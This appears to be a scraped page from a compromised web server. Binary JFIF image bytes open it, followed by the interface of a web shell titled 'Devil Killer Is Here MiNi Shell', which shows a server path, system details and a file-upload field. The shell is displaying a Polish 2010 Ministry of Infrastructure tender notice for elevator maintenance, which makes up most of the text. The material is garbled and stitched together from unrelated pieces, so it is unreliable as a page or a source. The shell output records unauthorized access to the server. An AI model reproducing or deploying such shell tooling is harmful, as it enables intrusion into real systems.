JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100318/60089-N-2010.html

<p class="kh_header"><b>Warszawa: KONSERWACJA URZĄDZEŃ DŹWIGOWYCH UŻYTKOWANYCH                        W BUDYNKACH A, B i C MINISTERSTWA INFRASTRUKTURY (MI)                     W WARSZAWIE PRZY UL. CHAŁUBIŃSKIEGO 4/6 
(ZAMÓWIENIE PODZIELONE NA 2 CZĘŚCI)</b><br>
<b>Numer ogłoszenia: 60089 - 2010; data zamieszczenia: 18.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Infrastruktury , ul. Chałubińskiego 4/6, 00-928 Warszawa, woj. mazowieckie, tel. 022 6301649, faks 022 6301649.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mi.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mi.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA URZĄDZEŃ DŹWIGOWYCH UŻYTKOWANYCH                        W BUDYNKACH A, B i C MINISTERSTWA INFRASTRUKTURY (MI)                     W WARSZAWIE PRZY UL. CHAŁUBIŃSKIEGO 4/6 
(ZAMÓWIENIE PODZIELONE NA 2 CZĘŚCI).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia składającego się z 2 części, objętego niniejszym przetargiem nieograniczonym jest konserwacja urządzeń dźwigowych użytkowanych w budynkach A, B i C Ministerstwa Infrastruktury w Warszawie przy ul. Chałubińskiego 4/6, przy czym konserwacja urządzeń dźwigowych użytkowanych w budynkach A i C stanowi część I zamówienia, natomiast konserwacja urządzeń dźwigowych użytkowanych w budynku B stanowi część II zamówienia.
Wykonywanie prac konserwacyjnych urządzeń dźwigowych w budynkach Ministerstwa Infrastruktury ma na celu utrzymywanie ich w stałej sprawności technicznej.

ZAKRES KONSERWACJI

Czynności konserwacyjne obejmują:

   1. Całodobowy nadzór pracy urządzeń dźwigowych.
       Usuwanie usterek w terminach nie dłuższych( od momentu zawiadomienia):
1) czas usuwania usterek w przypadku wystąpienia awarii związanej 
    z koniecznością uwolnienia osób                                                                   -   maks.   30 min, 
2) czas usuwania usterek w godzinach pracy Zamawiającego                          -    maks.   60 min,
3) czas usuwania usterek po godzinach pracy Zamawiającego                         -    maks.   90 min.
4) czas usuwania usterek w święta i w dni wolne od pracy                               -    maks. 240 min.
   2. Usuwanie awarii urządzeń dźwigowych i wykonywanie napraw związanych z usuwaniem awarii, na podstawie odrębnej umowy (bez uwzględniania kosztów robocizny) w wyniku postępowania o udzielenie zamówienia publicznego.
   3. Wykonywanie przeglądów konserwacyjnych o następującym zakresie:
       1) Sprawdzenie przez Wykonawcę:
a)	stanu technicznego występujących mechanizmów napędowych,
b)	działania urządzeń zabezpieczających,
c)	stanu cięgien nośnych i ich zamocowania,  
d)	stanu urządzeń chwytających,
e)	działania urządzeń: napędowych, sterujących, sygnalizacyjnych i oświetleniowych,
f)	stanu instalacji ochrony przeciwporażeniowej
        2) Podczas przeglądów konserwacyjnych Wykonawca winien wykonać:
a)	czyszczenie urządzeń napędowych i sterujących,
b)	smarowanie wszystkich punktów smarowniczych,
c)	smarowanie prowadnic w miarę potrzeb,
d)	usunięcie drobnych usterek i wad,
e)	wymianę drobnych części
        3) Ponadto, co 12 miesięcy Wykonawca winien sprawdzić:
a) stan konstrukcji nośnej (połączeń spawanych, nitowanych, skręcanych),
b) stan zamocowania prowadnic. 
    4.   Prowadzenie Książki wykonywanych prac konserwacyjnych i awarii.
    5. Dostawa niezbędnych materiałów konserwacyjno-eksploatacyjnych zapewniających należytą pracę urządzeń.

       W przypadku stwierdzenia podczas wykonywania czynności konserwacyjnych jakichkolwiek usterek lub niedomagań w pracy urządzeń, należy natychmiast przystąpić do usuwania usterek.
       W ramach konserwacji urządzeń dźwigowych należy wykonywać okresowe przeglądy wszystkich urządzeń, a w przypadku wystąpienia niedomagań w pracy urządzeń, należy wykonać czynności polegające na przywróceniu ich pełnej sprawności.
      Wykonawca zobowiązuje się wykonywać czynności konserwacyjne oraz stosować materiały konserwacyjno-eksploatacyjne zgodnie z wytycznymi producentów urządzeń zawartych w DTR-ach oraz przestrzegać przepisów BHP.


Uwaga
Osoby wykonujące konserwacje lub naprawy, powinny posiadać: ważne zaświadczenie kwalifikacyjne Urzędu Dozoru Technicznego oraz świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją sieci, urządzeń i instalacji o napięciu do 1kV. 
W związku z tym, że urządzenia dźwigowe w budynku B (poz. 3, 4 i 5 wykazu urządzeń) do końca 2011 roku objęte są gwarancją producenta, tj. przez firmę  HYDROMACH Warszawa, do wykonywania konserwacji tych urządzeń wymagane jest przedstawienie dokumentu autoryzacji wydanej przez tę firmę, bądź też pisemne zobowiązanie Wykonawcy na przejęcie obowiązków gwaranta na warunkach określonych w karcie gwarancyjnej producenta (do wglądu u Zamawiającego) urządzenia dźwigowego.

Zamawiający wymaga dostarczenia aprobat, certyfikatów na materiały konserwacyjno-eksploatacyjne, zastosowane do wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2 500 złotych (słownie: dwa tysiące pięćset złotych) dla całości zamówienia lub dla określonych jego części:
- dla I części zamówienia w wysokości: 900 złotych (słownie: dziewięćset złotych),
- dla II części zamówienia w wysokości: 1600 złotych (słownie: tysiąc sześćset złotych),
które należy wnieść na okres związania ofertą.
2. Wadium może być wniesione w następujących formach, według wyboru Wykonawcy:
a) pieniądzu, wpłaconym przelewem na rachunek bankowy Ministerstwa Infrastruktury:
SWIFT: NBPLPLPW
Pl. Powstańców Warszawy 4
00-950 Warszawa
Nr rachunku: 79 1010 1010 0056 0113 9120 0000
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) Ustawy z dnia                9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109,poz. 1158 z późn. zm.).
3. Wadium powinno być oznaczone w następujący sposób: Wadium - RZP B/2010/03/02/PN - w przetargu nieograniczonym na konserwację urządzeń dźwigowych.
4. Termin wniesienia wadium upływa wraz z upływem terminu składania ofert.
5. Wadium musi obejmować cały okres związania ofertą.
6. Jako termin wniesienia wadium w formie pieniądza zostanie przyjęty termin wpływu środków na rachunek  bankowy Zamawiającego.
7. Dowód wniesienia wadium należy dołączyć do oferty.
Dowód wniesienia wadium może zostać dołączony w formie oryginału lub potwierdzonej za zgodność
przez Wykonawcę kopii.
8. Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji ubezpieczeniowej musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i ust. 5 Pzp.
9. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
10. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46, ust. 4a Pzp.
11. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
12. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci niezwłocznie po zawarciu umowy sprawie zamówienia publicznego.
13. Zamawiający dokona niezwłocznie zwrotu wadium na wniosek Wykonawcy, który wycofa ofertę przed upływem terminu składania ofert.
14. Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
15. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
16. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu zostaną uznani Wykonawcy, którzy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia, tj. minimum jedno zamówienie z zakresu konserwacji urządzeń dźwigowych, na kwotę minimum 80 000,00 zł brutto;
2) za spełniających warunek udziału w postępowaniu, o którym mowa w ust. 1 pkt 3, zostaną uznani Wykonawcy dysponujący osobą/osobami, które będą wykonywać zamówienie, posiadającymi wymagane uprawnienia, t. j.:
-do konserwacji dźwigów wydane przez Urząd Dozoru Technicznego,
-do wykonywania pracy na stanowisku: eksploatacji, konserwacji sieci, urządzeń i instalacji o napięciu do 1 kV.  
3) za spełniających warunek udziału w postępowaniu, o którym mowa w ust. 1 pkt 4, zostaną uznani Wykonawcy, którzy posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na wartość nie mniejszą niż 50 000,00 PLN.
Uwaga:
W przypadku Wykonawców wspólnie występujących w Postępowaniu warunki określone w ust. 1 pkt 2) - 4) może spełniać łącznie grupa Wykonawców wspólnie występujących w Postępowaniu. Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnia na podstawie dokumentów i oświadczeń dołączonych do oferty złożonej w przedmiotowym Postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu zostaną uznani Wykonawcy, którzy dysponujący osobą/osobami, które będą wykonywać zamówienie, posiadającymi wymagane uprawnienia, t. j.:
-do konserwacji dźwigów wydane przez Urząd Dozoru Technicznego,
-do wykonywania pracy na stanowisku: eksploatacji, konserwacji sieci, urządzeń i instalacji o napięciu do 1 kV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu zostaną uznani Wykonawcy, którzy posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na wartość nie mniejszą niż 50 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin usuwania usterek - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mi.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Infrastruktury
Biuro Dyrektora Generalnego
Wydział Zamówień Publicznych
ul. Chałubińskiego 4/6,
00-928 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2010 godzina 12:00, miejsce: Ministerstwo Infrastruktury
Biuro Administracyjne
ul. Chałubińskiego 4/6, pok. 224 bud. A
00-928 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja urządzeń dźwigowych w budynku A i C Ministerstwa Infrastruktury ul. Chałubińskiego 4/6 w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie prac konserwacyjnych urządzeń dźwigowych w budynkach Ministerstwa Infrastruktury ma na celu utrzymywanie ich w stałej sprawności technicznej.

ZAKRES KONSERWACJI

Czynności konserwacyjne obejmują:

   1. Całodobowy nadzór pracy urządzeń dźwigowych.
       Usuwanie usterek w terminach nie dłuższych( od momentu zawiadomienia):
1) czas usuwania usterek w przypadku wystąpienia awarii związanej 
    z koniecznością uwolnienia osób                                                                   -   maks.   30 min, 
2) czas usuwania usterek w godzinach pracy Zamawiającego                          -    maks.   60 min,
3) czas usuwania usterek po godzinach pracy Zamawiającego                         -    maks.   90 min.
4) czas usuwania usterek w święta i w dni wolne od pracy                               -    maks. 240 min.
   2. Usuwanie awarii urządzeń dźwigowych i wykonywanie napraw związanych z usuwaniem awarii,                 na podstawie odrębnej umowy (bez uwzględniania kosztów robocizny) w wyniku postępowania                  o udzielenie zamówienia publicznego.
   3. Wykonywanie przeglądów konserwacyjnych o następującym zakresie:
       1) Sprawdzenie przez Wykonawcę:
a)	stanu technicznego występujących mechanizmów napędowych,
b)	działania urządzeń zabezpieczających,
c)	stanu cięgien nośnych i ich zamocowania,  
d)	stanu urządzeń chwytających,
e)	działania urządzeń: napędowych, sterujących, sygnalizacyjnych i oświetleniowych,
f)	stanu instalacji ochrony przeciwporażeniowej
        2) Podczas przeglądów konserwacyjnych Wykonawca winien wykonać:
a)	czyszczenie urządzeń napędowych i sterujących,
b)	smarowanie wszystkich punktów smarowniczych,
c)	smarowanie prowadnic w miarę potrzeb,
d)	usunięcie drobnych usterek i wad,
e)	wymianę drobnych części
        3) Ponadto, co 12 miesięcy Wykonawca winien sprawdzić:
a) stan konstrukcji nośnej (połączeń spawanych, nitowanych, skręcanych),
b) stan zamocowania prowadnic. 
    4.   Prowadzenie Książki wykonywanych prac konserwacyjnych i awarii.
    5. Dostawa niezbędnych materiałów konserwacyjno-eksploatacyjnych zapewniających należytą pracę urządzeń.

       W przypadku stwierdzenia podczas wykonywania czynności konserwacyjnych jakichkolwiek usterek lub niedomagań w pracy urządzeń, należy natychmiast przystąpić do usuwania usterek.
       W ramach konserwacji urządzeń dźwigowych należy wykonywać okresowe przeglądy wszystkich urządzeń, a w przypadku wystąpienia niedomagań w pracy urządzeń, należy wykonać czynności polegające na przywróceniu ich pełnej sprawności.
      Wykonawca zobowiązuje się wykonywać czynności konserwacyjne oraz stosować materiały konserwacyjno-eksploatacyjne zgodnie z wytycznymi producentów urządzeń zawartych w DTR-ach oraz przestrzegać przepisów BHP.


Uwaga
Osoby wykonujące konserwacje lub naprawy, powinny posiadać: ważne zaświadczenie kwalifikacyjne Urzędu Dozoru Technicznego oraz świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją sieci, urządzeń i instalacji o napięciu do 1kV. 

Zamawiający wymaga dostarczenia aprobat, certyfikatów na materiały konserwacyjno-eksploatacyjne, zastosowane do wykonania zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
